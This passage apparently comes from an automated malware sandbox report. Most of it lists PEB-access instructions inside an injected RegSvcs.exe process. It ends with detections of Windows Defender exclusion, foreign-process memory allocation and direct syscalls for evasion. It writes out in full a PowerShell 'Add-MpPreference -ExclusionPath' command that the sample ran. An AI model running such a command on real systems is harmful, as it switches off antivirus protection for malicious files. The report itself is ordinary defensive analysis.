                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015106F1 mov eax, dword ptr fs:[00000030h]7_2_015106F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E6F2 mov eax, dword ptr fs:[00000030h]7_2_0150E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E6F2 mov eax, dword ptr fs:[00000030h]7_2_0150E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E6F2 mov eax, dword ptr fs:[00000030h]7_2_0150E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E6F2 mov eax, dword ptr fs:[00000030h]7_2_0150E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01494690 mov eax, dword ptr fs:[00000030h]7_2_01494690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01494690 mov eax, dword ptr fs:[00000030h]7_2_01494690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC6A6 mov eax, dword ptr fs:[00000030h]7_2_014CC6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C66B0 mov eax, dword ptr fs:[00000030h]7_2_014C66B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564940 mov eax, dword ptr fs:[00000030h]7_2_01564940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01510946 mov eax, dword ptr fs:[00000030h]7_2_01510946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D096E mov eax, dword ptr fs:[00000030h]7_2_014D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D096E mov edx, dword ptr fs:[00000030h]7_2_014D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D096E mov eax, dword ptr fs:[00000030h]7_2_014D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B6962 mov eax, dword ptr fs:[00000030h]7_2_014B6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B6962 mov eax, dword ptr fs:[00000030h]7_2_014B6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B6962 mov eax, dword ptr fs:[00000030h]7_2_014B6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01534978 mov eax, dword ptr fs:[00000030h]7_2_01534978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01534978 mov eax, dword ptr fs:[00000030h]7_2_01534978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151C97C mov eax, dword ptr fs:[00000030h]7_2_0151C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151C912 mov eax, dword ptr fs:[00000030h]7_2_0151C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01488918 mov eax, dword ptr fs:[00000030h]7_2_01488918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01488918 mov eax, dword ptr fs:[00000030h]7_2_01488918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E908 mov eax, dword ptr fs:[00000030h]7_2_0150E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E908 mov eax, dword ptr fs:[00000030h]7_2_0150E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0152892B mov eax, dword ptr fs:[00000030h]7_2_0152892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151892A mov eax, dword ptr fs:[00000030h]7_2_0151892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155A9D3 mov eax, dword ptr fs:[00000030h]7_2_0155A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015269C0 mov eax, dword ptr fs:[00000030h]7_2_015269C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A9D0 mov eax, dword ptr fs:[00000030h]7_2_0149A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A9D0 mov eax, dword ptr fs:[00000030h]7_2_0149A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A9D0 mov eax, dword ptr fs:[00000030h]7_2_0149A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A9D0 mov eax, dword ptr fs:[00000030h]7_2_0149A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A9D0 mov eax, dword ptr fs:[00000030h]7_2_0149A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A9D0 mov eax, dword ptr fs:[00000030h]7_2_0149A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C49D0 mov eax, dword ptr fs:[00000030h]7_2_014C49D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151E9E0 mov eax, dword ptr fs:[00000030h]7_2_0151E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C29F9 mov eax, dword ptr fs:[00000030h]7_2_014C29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C29F9 mov eax, dword ptr fs:[00000030h]7_2_014C29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015189B3 mov esi, dword ptr fs:[00000030h]7_2_015189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015189B3 mov eax, dword ptr fs:[00000030h]7_2_015189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015189B3 mov eax, dword ptr fs:[00000030h]7_2_015189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014909AD mov eax, dword ptr fs:[00000030h]7_2_014909AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014909AD mov eax, dword ptr fs:[00000030h]7_2_014909AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]7_2_014A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A2840 mov ecx, dword ptr fs:[00000030h]7_2_014A2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01494859 mov eax, dword ptr fs:[00000030h]7_2_01494859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01494859 mov eax, dword ptr fs:[00000030h]7_2_01494859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C0854 mov eax, dword ptr fs:[00000030h]7_2_014C0854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01526870 mov eax, dword ptr fs:[00000030h]7_2_01526870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01526870 mov eax, dword ptr fs:[00000030h]7_2_01526870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151E872 mov eax, dword ptr fs:[00000030h]7_2_0151E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151E872 mov eax, dword ptr fs:[00000030h]7_2_0151E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151C810 mov eax, dword ptr fs:[00000030h]7_2_0151C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153483A mov eax, dword ptr fs:[00000030h]7_2_0153483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153483A mov eax, dword ptr fs:[00000030h]7_2_0153483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA830 mov eax, dword ptr fs:[00000030h]7_2_014CA830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B2835 mov eax, dword ptr fs:[00000030h]7_2_014B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B2835 mov eax, dword ptr fs:[00000030h]7_2_014B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B2835 mov eax, dword ptr fs:[00000030h]7_2_014B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B2835 mov ecx, dword ptr fs:[00000030h]7_2_014B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B2835 mov eax, dword ptr fs:[00000030h]7_2_014B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B2835 mov eax, dword ptr fs:[00000030h]7_2_014B2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE8C0 mov eax, dword ptr fs:[00000030h]7_2_014BE8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015608C0 mov eax, dword ptr fs:[00000030h]7_2_015608C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155A8E4 mov eax, dword ptr fs:[00000030h]7_2_0155A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC8F9 mov eax, dword ptr fs:[00000030h]7_2_014CC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC8F9 mov eax, dword ptr fs:[00000030h]7_2_014CC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151C89D mov eax, dword ptr fs:[00000030h]7_2_0151C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01490887 mov eax, dword ptr fs:[00000030h]7_2_01490887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01562B57 mov eax, dword ptr fs:[00000030h]7_2_01562B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01562B57 mov eax, dword ptr fs:[00000030h]7_2_01562B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01562B57 mov eax, dword ptr fs:[00000030h]7_2_01562B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01562B57 mov eax, dword ptr fs:[00000030h]7_2_01562B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153EB50 mov eax, dword ptr fs:[00000030h]7_2_0153EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01538B42 mov eax, dword ptr fs:[00000030h]7_2_01538B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01526B40 mov eax, dword ptr fs:[00000030h]7_2_01526B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01526B40 mov eax, dword ptr fs:[00000030h]7_2_01526B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155AB40 mov eax, dword ptr fs:[00000030h]7_2_0155AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01488B50 mov eax, dword ptr fs:[00000030h]7_2_01488B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01544B4B mov eax, dword ptr fs:[00000030h]7_2_01544B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01544B4B mov eax, dword ptr fs:[00000030h]7_2_01544B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148CB7E mov eax, dword ptr fs:[00000030h]7_2_0148CB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]7_2_0150EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]7_2_0150EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]7_2_0150EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]7_2_0150EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]7_2_0150EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]7_2_0150EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]7_2_0150EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]7_2_0150EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]7_2_0150EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564B00 mov eax, dword ptr fs:[00000030h]7_2_01564B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BEB20 mov eax, dword ptr fs:[00000030h]7_2_014BEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BEB20 mov eax, dword ptr fs:[00000030h]7_2_014BEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01558B28 mov eax, dword ptr fs:[00000030h]7_2_01558B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01558B28 mov eax, dword ptr fs:[00000030h]7_2_01558B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B0BCB mov eax, dword ptr fs:[00000030h]7_2_014B0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B0BCB mov eax, dword ptr fs:[00000030h]7_2_014B0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B0BCB mov eax, dword ptr fs:[00000030h]7_2_014B0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153EBD0 mov eax, dword ptr fs:[00000030h]7_2_0153EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01490BCD mov eax, dword ptr fs:[00000030h]7_2_01490BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01490BCD mov eax, dword ptr fs:[00000030h]7_2_01490BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01490BCD mov eax, dword ptr fs:[00000030h]7_2_01490BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151CBF0 mov eax, dword ptr fs:[00000030h]7_2_0151CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BEBFC mov eax, dword ptr fs:[00000030h]7_2_014BEBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01498BF0 mov eax, dword ptr fs:[00000030h]7_2_01498BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01498BF0 mov eax, dword ptr fs:[00000030h]7_2_01498BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01498BF0 mov eax, dword ptr fs:[00000030h]7_2_01498BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01544BB0 mov eax, dword ptr fs:[00000030h]7_2_01544BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01544BB0 mov eax, dword ptr fs:[00000030h]7_2_01544BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0BBE mov eax, dword ptr fs:[00000030h]7_2_014A0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0BBE mov eax, dword ptr fs:[00000030h]7_2_014A0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0A5B mov eax, dword ptr fs:[00000030h]7_2_014A0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0A5B mov eax, dword ptr fs:[00000030h]7_2_014A0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]7_2_01496A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]7_2_01496A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]7_2_01496A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]7_2_01496A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]7_2_01496A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]7_2_01496A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]7_2_01496A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150CA72 mov eax, dword ptr fs:[00000030h]7_2_0150CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150CA72 mov eax, dword ptr fs:[00000030h]7_2_0150CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CCA6F mov eax, dword ptr fs:[00000030h]7_2_014CCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CCA6F mov eax, dword ptr fs:[00000030h]7_2_014CCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CCA6F mov eax, dword ptr fs:[00000030h]7_2_014CCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153EA60 mov eax, dword ptr fs:[00000030h]7_2_0153EA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151CA11 mov eax, dword ptr fs:[00000030h]7_2_0151CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BEA2E mov eax, dword ptr fs:[00000030h]7_2_014BEA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CCA24 mov eax, dword ptr fs:[00000030h]7_2_014CCA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CCA38 mov eax, dword ptr fs:[00000030h]7_2_014CCA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B4A35 mov eax, dword ptr fs:[00000030h]7_2_014B4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B4A35 mov eax, dword ptr fs:[00000030h]7_2_014B4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014E6ACC mov eax, dword ptr fs:[00000030h]7_2_014E6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014E6ACC mov eax, dword ptr fs:[00000030h]7_2_014E6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014E6ACC mov eax, dword ptr fs:[00000030h]7_2_014E6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01490AD0 mov eax, dword ptr fs:[00000030h]7_2_01490AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C4AD0 mov eax, dword ptr fs:[00000030h]7_2_014C4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C4AD0 mov eax, dword ptr fs:[00000030h]7_2_014C4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CAAEE mov eax, dword ptr fs:[00000030h]7_2_014CAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CAAEE mov eax, dword ptr fs:[00000030h]7_2_014CAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149EA80 mov eax, dword ptr fs:[00000030h]7_2_0149EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149EA80 mov eax, dword ptr fs:[00000030h]7_2_0149EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149EA80 mov eax, dword ptr fs:[00000030h]7_2_0149EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149EA80 mov eax, dword ptr fs:[00000030h]7_2_0149EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149EA80 mov eax, dword ptr fs:[00000030h]7_2_0149EA80
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe"
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe"Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
